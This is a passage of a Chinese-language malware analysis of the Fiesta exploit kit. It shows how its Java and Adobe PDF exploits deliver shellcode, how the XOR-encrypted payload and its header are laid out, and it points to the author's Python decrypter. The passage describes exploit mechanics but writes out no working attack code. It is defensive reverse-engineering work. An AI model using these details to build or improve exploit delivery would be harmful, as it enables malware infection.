这个XOR解密用在整个PE数据回收中,从前面的代码段中还可以看到payload的文件名是纯数字的为当前的计算机的时间。

在将java代码转换成python后我们可以很容易的解码他。

images

在成功解码数据后我们可以将payload放入Fiesta,现在在payload上让我们尝试我们前面说过的flash exp。

images

可惜看起来似乎不能工作,解密后的payload的运行结果无论是Flash,adobe PDF还是Silverlight都返回错误。它看起来似乎不是普通的java代码,是利用了一种基于控制执行的shellcode,并且使用不同的加密手段。我们可以从硬盘上解密出的payload看到,是不同于最初256字节的XOR块的,payload可以传输任何shellcode。

images

现在我们需要查看exp中的shellcode,先前我们已经看过了flash exp但是停在了利用点,现在我们可以通过java exp去解密payload,那么接下来我们来看看另一种类型:adobe pdf

0x04 Adobe PDF exploit


样本:f4346a65ea040c1c40fac10afa9bd59d

使用peepdf分析PDF:

image

peepdf告诉我们有一个AcroForm和一些JavaScript。我们看一下AcroForm,就会看到调用初始化时其实用的是JavaScript,手续跟踪object关系直到找到XFA:

image

下滑就找到真正的AcroForm脚本,就能找到初始化设置的(混淆的)JavaScript代码

image

清理下代码找到最后看看漏洞如何触发的,在这段JavaScript代码中,一个恶意的image对象被shellcode创建:

image

在expl_imgdata传给image之前提取出来,可以用base64解码,看看shellcode,在shellcode当中我们找到真正的解密函数,与之前的Java exploit完全一样。

256字节的XOR key之前有16个(额外)个字节保存信息。shellcode中下载payload,前16个字节被用于确定实际payload的大小,这些值是XOR的。前4个字节是下12个字节XOR key。看起来是这样子的:

image

解密这个payload,我们可以跳过前16字节,解密出来的数据多了25字节,25字节之后就是正常的MZ头,我们找到了有效的PE。那么这里有什么呢?更多的信息需要把文件放在系统上,MZ头之前的数据是文件大小,硬盘上的文件名:

image

通过这些信息,我们得到一个可以执行的PE文件,解密的样本可以从这里下载:31af1a5656ce741889984e8e878c7836

我写了一个可以从网络数据中解密任何Fiesta payload的Python脚本,已经在最近10个Fiesta EK上测试过了,两个参数,第一个是需要解密文件,第二个是输出文件,将会输出有效的PE文件:

https://github.com/0x3a/tools/blob/master/fiesta-payload-decrypter.py

Comment

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*